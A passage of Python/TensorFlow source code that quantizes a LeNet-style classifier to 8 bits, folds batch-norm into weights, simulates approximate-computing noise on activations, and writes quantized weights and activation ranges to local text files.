def body(self, images):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
# Body
net, layers = self._body(self, images, self._preWeights, self._preBias)
logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses, \
weightInit=Layer.ConstInit(self._preWeights['FC_Logits']), wd=self._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(self._preBias['FC_Logits']), \
activation=Layer.Linear, \
fakeQuant=True, name='FC_Logits', dtype=tf.float32)
layers.append(logits)
return logits.output, layers
def _postInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
self._quantLayers = {}
self._haveWeights = {}
self._haveBN = {}
self._layersTable = {}
self._layerInfos = []
self._layerNames = []
self._layerTypes = []
for idx in range(len(self._layers)):
print('Analyzing layer: ', self._layers[idx]._name)
name = self._layers[idx]._name
self._layersTable[name] = self._layers[idx]
layertype = self._layers[idx]._type
self._layerNames.append(name)
self._quantLayers[name] = {}
for varName in self._layers[idx]._variables.keys():
if varName == 'Weights':
self._haveWeights[name] = True
weights = self._layers[idx]._variables[varName]
self._quantLayers[name]['Weights'] = weights
print(self._layers[idx]._variables[varName])
elif varName == 'Bias':
self._haveWeights[name] = True
bias = self._layers[idx]._variables[varName]
self._quantLayers[name]['Bias'] = bias
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._haveBN[name] = True
offset = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Offset'] = offset
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._haveBN[name] = True
scale = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Scale'] = scale
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._haveBN[name] = True
movmean = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovMean'] = movmean
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._haveBN[name] = True
movvar = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovVar'] = movvar
print(self._layers[idx]._variables[varName])
act_min = self._layers[idx].outMin
self._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._layers[idx].outMax
self._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._layers[idx]._strideConv[1]]
if self._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]])
self._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]]
self._layerInfos.append(info)
else:
info = []
self._layerInfos.append(info)
self._layerTypes.append(layertype)
# print(self._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._quantLayers[l][x]), self._quantLayers[l].keys())), self._layerNames))
def _postTrain(self, path='./QuantWeights'):
def quantWeights(weights, layerName):
#print('Max: ', weights.max(), '; Min: ', weights.min())
#S_weights = (weights.max() - weights.min()) / 255
#Z_weights = int(np.round((0.0 - weights.min()) / S_weights))
#Q_weights = np.round((weights - weights.min()) / S_weights).astype(np.int)
maxabs = np.abs(weights).max()
# maxabs = self._layersTable[layerName]._weightMax.eval(session=self._sess)
print('Max: ', weights.max(), '; Min: ', weights.min(), '; Abs: ', maxabs)
S_weights = 2 * maxabs / 255.0
Z_weights = 128
Q_weights = np.zeros_like(weights).astype(np.int)
Q_weights[weights == 0] = Z_weights
Q_weights[weights > 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights > 0]
Q_weights[weights < 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights < 0]
# Q_weights = np.round((weights + maxabs) / S_weights).astype(np.int)
Q_weights[Q_weights > 255] = 255
Q_weights[Q_weights < 0] = 0
print(" -> 0:", np.sum(Q_weights == 0), "127:", np.sum(Q_weights == 127), "128:", np.sum(Q_weights == 128), "129:", np.sum(Q_weights == 129), "255:", np.sum(Q_weights == 255))
return S_weights, Z_weights, Q_weights
def quantBias(biases, S_input, S_weights, layerName):
print('Max: ', biases.max(), '; Min: ', biases.min())
S_biases = S_input * S_weights
Z_biases = 0
Q_biases = np.round(biases / S_biases).astype(np.int)
return S_biases, Z_biases, Q_biases
def quantAct(minAct, maxAct):
print('Max: ', maxAct, '; Min: ', minAct)
S_acts = (maxAct - minAct) / 255
Z_acts = int(np.round((0.0 - minAct) / S_acts))
return S_acts, Z_acts
#maxabs = max(abs(maxAct), abs(minAct))
#print('Max: ', maxAct, '; Min: ', minAct, '; MaxAbs: ', maxabs)
#S_acts = 2 * maxabs / 255.0
#Z_acts = 128
#return S_acts, Z_acts
self._postWeights = {}
self._postBias = {}
self._postActivationsMax = {}
self._postActivationsMin = {}
S_input = 1.0 / 255.0
Z_input = 0
S_last = S_input
f_names = open(path + '/' + self._name+'_names.txt', 'w')
f_config = open(path + '/' + self._name+'_config.txt', 'w')
f_debug = open('./Debug.txt', 'w')
for idx in range(len(self._layerNames)):
name = self._layerNames[idx]
layertype = self._layerTypes[idx]
f_names.write(name + " " + layertype + "\n")
print("Quantizing Layer:", name)
if name in self._haveWeights:
weights = self._sess.run(self._quantLayers[name]['Weights'])
bias = self._sess.run(self._quantLayers[name]['Bias'])
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
if name in self._haveBN:
offset = self._sess.run(self._quantLayers[name]['BN_Offset'])
scale = self._sess.run(self._quantLayers[name]['BN_Scale'])
movmean = self._sess.run(self._quantLayers[name]['BN_MovMean'])
movvar = self._sess.run(self._quantLayers[name]['BN_MovVar'])
assert len(offset.shape) == 1, 'WRONG: offset'
assert len(scale.shape) == 1, 'WRONG: scale'
assert len(movmean.shape) == 1, 'WRONG: movmean'
assert len(movvar.shape) == 1, 'WRONG: movvar'
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
shape_weights = weights.shape
shape_bias = bias.shape
for jdx in range(len(shape_weights)):
f_config.write(str(shape_weights[jdx]) + " ")
for info in self._layerInfos[idx]:
f_config.write(str(info) + " ")
f_config.write("\n")
weights = weights.reshape([-1])
bias = bias.reshape([-1])
S_weights, Z_weights, Q_weights = quantWeights(weights, name)
S_biases, Z_biases, Q_biases = quantBias(bias, S_last, S_weights, name)
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postWeights[name] = S_weights * (Q_weights - Z_weights)
self._postBias[name] = S_biases * (Q_biases - Z_biases)
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
print(name, ' weights: ', file = f_debug)
print(self._postWeights[name], file = f_debug)
print(name, ' bias: ', file = f_debug)
print(self._postBias[name], file = f_debug)
with open(path + '/' + name + '_weights.txt', 'w') as fout:
fout.write(str(S_weights) + "\n")
fout.write(str(Z_weights) + "\n")
for idx in range(Q_weights.shape[0]):
fout.write(str(Q_weights[idx]) + " ")
with open(path + '/' + name + '_biases.txt', 'w') as fout:
fout.write(str(S_biases) + "\n")
fout.write(str(Z_biases) + "\n")
for idx in range(Q_biases.shape[0]):
fout.write(str(Q_biases[idx]) + " ")
with open(path + '/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
else:
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
if layertype.find('Pooling') >= 0:
f_config.write(str(self._layerInfos[idx][0]) + " " + str(self._layerInfos[idx][1]))
f_config.write("\n")
with open(path + '/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
f_names.close()
f_config.close()
f_debug.close()
class Net4Approx(Net4Classify):
def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Approx'):
self._pretrained = pretrained
self._preInit()
Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)
def _preInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._pretrained._graph, quant_delay=0)
self._pretrained._quantLayers = {}
self._pretrained._haveWeights = {}
self._pretrained._haveBN = {}
self._pretrained._layerInfos = []
self._pretrained._layerNames = []
self._pretrained._layerTypes = []
for idx in range(len(self._pretrained._layers)):
print('Analyzing layer: ', self._pretrained._layers[idx]._name)
name = self._pretrained._layers[idx]._name
layertype = self._pretrained._layers[idx]._type
self._pretrained._layerNames.append(name)
self._pretrained._quantLayers[name] = {}
for varName in self._pretrained._layers[idx]._variables.keys():
if varName == 'Weights':
self._pretrained._haveWeights[name] = True
weights = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Weights'] = weights
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'Bias':
self._pretrained._haveWeights[name] = True
bias = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['Bias'] = bias
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._pretrained._haveBN[name] = True
offset = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Offset'] = offset
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._pretrained._haveBN[name] = True
scale = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_Scale'] = scale
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._pretrained._haveBN[name] = True
movmean = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovMean'] = movmean
print(self._pretrained._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._pretrained._haveBN[name] = True
movvar = self._pretrained._layers[idx]._variables[varName]
self._pretrained._quantLayers[name]['BN_MovVar'] = movvar
print(self._pretrained._layers[idx]._variables[varName])
act_min = self._pretrained._layers[idx].outMin
self._pretrained._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._pretrained._layers[idx].outMax
self._pretrained._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._pretrained._layers[idx]._strideConv[1]]
if self._pretrained._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]])
self._pretrained._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._pretrained._layers[idx]._sizePooling[1], self._pretrained._layers[idx]._stridePooling[1]]
self._pretrained._layerInfos.append(info)
else:
info = []
self._pretrained._layerInfos.append(info)
self._pretrained._layerTypes.append(layertype)
# print(self._pretrained._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._pretrained._quantLayers[l][x]), self._pretrained._quantLayers[l].keys())), self._pretrained._layerNames))
self._preWeights = {}
self._preBias = {}
for idx in range(len(self._pretrained._layerNames)):
name = self._pretrained._layerNames[idx]
layertype = self._pretrained._layerTypes[idx]
print("Copying Layer:", name)
if name in self._pretrained._haveWeights:
weights = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Weights'])
bias = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Bias']) if 'Bias' in self._pretrained._quantLayers[name] else 0.0
act_min = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Min'])
act_max = self._pretrained._sess.run(self._pretrained._quantLayers[name]['Act_Max'])
if name in self._pretrained._haveBN:
offset = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Offset']) if 'BN_Offset' in self._pretrained._quantLayers[name] else 0.0
scale = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_Scale']) if 'BN_Scale' in self._pretrained._quantLayers[name] else 1.0
movmean = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovMean'])
movvar = self._pretrained._sess.run(self._pretrained._quantLayers[name]['BN_MovVar'])
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
self._preWeights[name] = weights
self._preBias[name] = bias
def body(self, images):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output += PORTION * (output - tf.reduce_min(output)) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
output += PORTION * tf.abs(output) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
return output
# Body
net, layers = self._body(self, images, self._preWeights, self._preBias)
logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses, \
weightInit=Layer.ConstInit(self._preWeights['FC_Logits']), wd=self._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(self._preBias['FC_Logits']), \
activation=Layer.Linear, \
fakeQuant=True, name='FC_Logits', dtype=tf.float32)
layers.append(logits)
return logits.output, layers
def _postInit(self):
# tf.contrib.quantize.create_training_graph(input_graph=self._graph, quant_delay=0)
self._quantLayers = {}
self._layersTable = {}
self._haveWeights = {}
self._haveBN = {}
self._layerInfos = []
self._layerNames = []
self._layerTypes = []
for idx in range(len(self._layers)):
print('Analyzing layer: ', self._layers[idx]._name)
name = self._layers[idx]._name
layertype = self._layers[idx]._type
self._layersTable[name] = self._layers[idx]
self._layerNames.append(name)
self._quantLayers[name] = {}
for varName in self._layers[idx]._variables.keys():
if varName == 'Weights':
self._haveWeights[name] = True
weights = self._layers[idx]._variables[varName]
self._quantLayers[name]['Weights'] = weights
print(self._layers[idx]._variables[varName])
elif varName == 'Bias':
self._haveWeights[name] = True
bias = self._layers[idx]._variables[varName]
self._quantLayers[name]['Bias'] = bias
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Offset':
self._haveBN[name] = True
offset = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Offset'] = offset
print(self._layers[idx]._variables[varName])
elif varName == 'BN_Scale':
self._haveBN[name] = True
scale = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_Scale'] = scale
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovMean':
self._haveBN[name] = True
movmean = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovMean'] = movmean
print(self._layers[idx]._variables[varName])
elif varName == 'BN_MovVar':
self._haveBN[name] = True
movvar = self._layers[idx]._variables[varName]
self._quantLayers[name]['BN_MovVar'] = movvar
print(self._layers[idx]._variables[varName])
act_min = self._layers[idx].outMin
self._quantLayers[name]['Act_Min'] = act_min
print(act_min)
act_max = self._layers[idx].outMax
self._quantLayers[name]['Act_Max'] = act_max
print(act_max)
if layertype.find('Conv') >= 0:
info = [self._layers[idx]._strideConv[1]]
if self._layers[idx]._pool:
layertype += 'Pooling'
info.extend([self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]])
self._layerInfos.append(info)
elif layertype.find('Pooling') >= 0:
info = [self._layers[idx]._sizePooling[1], self._layers[idx]._stridePooling[1]]
self._layerInfos.append(info)
else:
info = []
self._layerInfos.append(info)
self._layerTypes.append(layertype)
# print(self._layers[idx]._variables)
list(map(lambda l: print(l) or list(map(lambda x: print("\t", x, ":", self._quantLayers[l][x]), self._quantLayers[l].keys())), self._layerNames))
def _postTrain(self, path='./ApproxWeights'):
def quantWeights(weights, layerName):
#print('Max: ', weights.max(), '; Min: ', weights.min())
#S_weights = (weights.max() - weights.min()) / 255
#Z_weights = int(np.round((0.0 - weights.min()) / S_weights))
#Q_weights = np.round((weights - weights.min()) / S_weights).astype(np.int)
maxabs = np.abs(weights).max()
# maxabs = self._layersTable[layerName]._weightMax.eval(session=self._sess)
print('Max: ', weights.max(), '; Min: ', weights.min(), '; Abs: ', maxabs)
S_weights = 2 * maxabs / 255.0
Z_weights = 128
Q_weights = np.zeros_like(weights).astype(np.int)
Q_weights[weights == 0] = Z_weights
Q_weights[weights > 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights > 0]
Q_weights[weights < 0] = (Z_weights + np.round((weights) / S_weights).astype(np.int))[weights < 0]
# Q_weights = np.round((weights + maxabs) / S_weights).astype(np.int)
Q_weights[Q_weights > 255] = 255
Q_weights[Q_weights < 0] = 0
print(" -> 0:", np.sum(Q_weights == 0), "127:", np.sum(Q_weights == 127), "128:", np.sum(Q_weights == 128), "129:", np.sum(Q_weights == 129), "255:", np.sum(Q_weights == 255))
return S_weights, Z_weights, Q_weights
def quantBias(biases, S_input, S_weights, layerName):
print('Max: ', biases.max(), '; Min: ', biases.min())
S_biases = S_input * S_weights
Z_biases = 0
Q_biases = np.round(biases / S_biases).astype(np.int)
return S_biases, Z_biases, Q_biases
def quantAct(minAct, maxAct):
print('Max: ', maxAct, '; Min: ', minAct)
S_acts = (maxAct - minAct) / 255
Z_acts = int(np.round((0.0 - minAct) / S_acts))
return S_acts, Z_acts
#maxabs = max(abs(maxAct), abs(minAct))
#print('Max: ', maxAct, '; Min: ', minAct, '; MaxAbs: ', maxabs)
#S_acts = 2 * maxabs / 255.0
#Z_acts = 128
#return S_acts, Z_acts
self._postWeights = {}
self._postBias = {}
self._postActivationsMax = {}
self._postActivationsMin = {}
S_input = 1.0 / 255.0
Z_input = 0
S_last = S_input
f_names = open('./ApproxWeights/' + self._name+'_names.txt', 'w')
f_config = open('./ApproxWeights/' + self._name+'_config.txt', 'w')
f_debug = open('./Debug.txt', 'w')
for idx in range(len(self._layerNames)):
name = self._layerNames[idx]
layertype = self._layerTypes[idx]
f_names.write(name + " " + layertype + "\n")
print("Quantizing Layer:", name)
if name in self._haveWeights:
weights = self._sess.run(self._quantLayers[name]['Weights'])
bias = self._sess.run(self._quantLayers[name]['Bias'])
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
if name in self._haveBN:
offset = self._sess.run(self._quantLayers[name]['BN_Offset'])
scale = self._sess.run(self._quantLayers[name]['BN_Scale'])
movmean = self._sess.run(self._quantLayers[name]['BN_MovMean'])
movvar = self._sess.run(self._quantLayers[name]['BN_MovVar'])
assert len(offset.shape) == 1, 'WRONG: offset'
assert len(scale.shape) == 1, 'WRONG: scale'
assert len(movmean.shape) == 1, 'WRONG: movmean'
assert len(movvar.shape) == 1, 'WRONG: movvar'
stddev = np.sqrt(movvar + 1e-8)
tmp = scale / stddev
weights = weights * tmp
bias = offset + tmp * (bias - movmean)
shape_weights = weights.shape
shape_bias = bias.shape
for jdx in range(len(shape_weights)):
f_config.write(str(shape_weights[jdx]) + " ")
for info in self._layerInfos[idx]:
f_config.write(str(info) + " ")
f_config.write("\n")
weights = weights.reshape([-1])
bias = bias.reshape([-1])
S_weights, Z_weights, Q_weights = quantWeights(weights, name)
S_biases, Z_biases, Q_biases = quantBias(bias, S_last, S_weights, name)
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postWeights[name] = S_weights * (Q_weights - Z_weights)
self._postBias[name] = S_biases * (Q_biases - Z_biases)
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
print(name, ' weights: ', file = f_debug)
print(self._postWeights[name], file = f_debug)
print(name, ' bias: ', file = f_debug)
print(self._postBias[name], file = f_debug)
with open('./ApproxWeights/' + name + '_weights.txt', 'w') as fout:
fout.write(str(S_weights) + "\n")
fout.write(str(Z_weights) + "\n")
for idx in range(Q_weights.shape[0]):
fout.write(str(Q_weights[idx]) + " ")
with open('./ApproxWeights/' + name + '_biases.txt', 'w') as fout:
fout.write(str(S_biases) + "\n")
fout.write(str(Z_biases) + "\n")
for idx in range(Q_biases.shape[0]):
fout.write(str(Q_biases[idx]) + " ")
with open('./ApproxWeights/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
else:
act_min = self._sess.run(self._quantLayers[name]['Act_Min'])
act_max = self._sess.run(self._quantLayers[name]['Act_Max'])
S_acts, Z_acts = quantAct(act_min, act_max)
S_last = S_acts
self._postActivationsMin[name] = act_min
self._postActivationsMax[name] = act_max
if layertype.find('Pooling') >= 0:
f_config.write(str(self._layerInfos[idx][0]) + " " + str(self._layerInfos[idx][1]))
f_config.write("\n")
with open('./ApproxWeights/' + name + '_activations.txt', 'w') as fout:
fout.write(str(S_acts) + "\n")
fout.write(str(Z_acts) + "\n")
f_names.close()
f_config.close()
f_debug.close()
class Net4Eval(Net4Classify):
def __init__(self, inputShape, numClasses, body, pretrained, HParam=HParamDefault, name='Net4Quant'):
self._pretrained = pretrained
self._preInit()
Net4Classify.__init__(self, inputShape, numClasses, body, HParam, name)
with self._graph.as_default():
self._sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
def _preInit(self):
self._preWeights = self._pretrained._postWeights
self._preBias = self._pretrained._postBias
self._preActivationsMin = self._pretrained._postActivationsMin
self._preActivationsMax = self._pretrained._postActivationsMax
def body(self, images):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
# Body
net, layers = self._body(self, images, self._preWeights, self._preBias, self._preActivationsMin, self._preActivationsMax)
logits = Layer.FullyConnected(_outWrapper(net), outputSize=self._numClasses, \
weightInit=Layer.ConstInit(self._preWeights['FC_Logits']), wd=self._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(self._preBias['FC_Logits']), \
activation=Layer.Linear, \
name='FC_Logits', dtype=tf.float32)
logits.setMinMax(self._preActivationsMin['FC_Logits'], self._preActivationsMax['FC_Logits'])
layers.append(logits)
return logits.output, layers
def saveMiddle(self, image):
np.set_printoptions(threshold=np.inf)
fout = open('Middle.txt', 'w')
print('Image: ', file=fout)
print(image, file=fout)
for layer in self._layers:
name = layer._name
print('Result: ', name, file=fout)
result = self._sess.run(layer._output, feed_dict={tf._images: image})[0]
print(result, file=fout)
def _postInit(self):
pass
def _postTrain(self):
pass
def LeNetBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=16, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=256, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def LeNetBNBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=16, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=256, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def LeNetBody_Quant(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=16, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=32, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=64, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=256, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
return net, layers
def LeNetBody_Approx(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output += PORTION * (output - tf.reduce_min(output)) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
output += PORTION * tf.abs(output) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=16, \
convKernel=[5, 5], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1']), \
